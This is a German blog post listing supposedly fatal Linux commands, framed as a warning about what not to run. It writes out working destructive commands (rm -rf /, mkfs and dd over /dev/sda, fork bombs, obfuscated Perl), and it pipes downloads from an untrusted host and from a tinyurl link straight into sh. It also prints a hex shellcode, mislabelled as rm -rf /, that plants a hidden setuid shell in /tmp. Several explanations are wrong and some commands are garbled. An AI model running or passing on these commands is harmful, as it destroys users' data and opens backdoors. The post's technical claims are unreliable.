Top10 Linux Killer Befehle

09.12.2021

Top 10 Killer Kommandos - Linux Befehle, die für Ihren Dateien oder sogar Ihr gesamtes Betriebssystem absolut tödlich verlaufen können. Um dieses gefährliche Szenario zu vermeiden, habe hier eine Liste der Top-Ten Linux Killer-Befehle, die Sie unbedingt vermeiden sollten.

1.Code:

rm -rf /

Dieser Befehl wirkt rekursiv und löscht auf einen Schlag gewaltsam alle Dateien im Root-Verzeichnis.

rm-rf / funktioniert allerdings nicht mehr mit den meisten neueren Distributionen.

Auch jetzt sind die meisten großen Distributionen (Ubuntu, Fedora, openSUSE, Mandriva) immun dagegen

2.Code:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Dies ist die Hex-Version von [rm-rf /] und kann selbst erfahrene Linux-Benutzer täuschen

3.Code:

mkfs.ext3 /dev/sda

Dieses Kombination formatiert bzw. wiped alle Dateien des Geräts nach dem Befehl mkfs

4.Code:

:(){:|:&};:

Bekannt als forkbomb, sorgt dieser Befehl dafür, dass das System eine große Anzahl von Prozessen ausführt, solange bis es dann einfriert. Dies kann oft dazu führen, dass die Daten zerstörrt bzw. beschädigt werden

5.Code:

any_command > /dev/sda

Mit diesem Befehl werden Roh-Daten auf das Block-Gerät geschrieben und kann in der Regel das Dateisystem zerstören, was insgesamt den Verlust von Daten bedeutet.

6.Code:

wget http://some\_untrusted\_source -O- | sh

Nie Downloads aus einer nicht vertrauenswürdigen Quellen annehmen, denn dies kann dazu führen das anschließend möglicherweise schädliche Codes bei Ihnen ausgeführt wird.

7.Code:

mv /home/yourhomedirectory/* /dev/null

Mit diesem Befehl werden alle Dateien in Ihrem Home-Verzeichnis an einen Speicher-Ort geschickt, der nicht vorhanden ist. Daher werden Sie nach diesem Befehl Ihre Dateien nie wieder sehen.

Sie können auch den letzten Teil des Befehls (mv /home/yourhomedirectory/* /dev/null) mit folgendem vertauschen:

mv ~/* /dev/null

8.Code:

  • dd if=/dev/urandom of=/dev/sda
  • dd if=/dev/zero of=/dev/sda

Wenn Sie einen dieser Beiden Befehle eingeben werden Ihre Festplatten komplett mit Nullen beschrieben.

9. Code:

dd if=/dev/random of=/dev/port

10.Killer-Code:

>cat /dev/portt

funktioniert scheinbar auch

Weitere Killer Befehle:

echo "$0&$0&">\_;chmod +x \_;./\_

s!/\*.\*?\*/!!sg

perl -e 'while(1) {fork();}'

perl -e '''=~('(?{'.('\]'^'-').(('\]'^'-')|'"').('\`'|')').('\`'|'.').(('\]'^'-')|'$').'"'.(('\]'^'-')|'#').(('\]'^'-')|')').(('\]'^'-')|'#'

perl -e '$??s:;s:s;;$?::s;;=\]=>%-{<-|}<&|\`{;;y; -/:[email protected]\[-\`{-};\`-{/" -;;s;;$\_;see'

while :; do mkdir foobar && echo gg >| hrhr ;cd foobar ;done &

echo $0 ; $0 &

\[$\[$RANDOM%6\]=0\]&&rm -rf /

for i in /dev/{hd\*,sd\*}; echo Drop the Dilmom! I repeat: drop the Dilmom! && dd if=/dev/urandom of=$i

echo "$0&$0">.-.&&. .-..

Dasselbe ergibt anscheinen der Befehl:

lynix -dump http://tinyurl.com/funtrixwithnix|awk 'NR==44{print $1,$2" /\*"}'|sh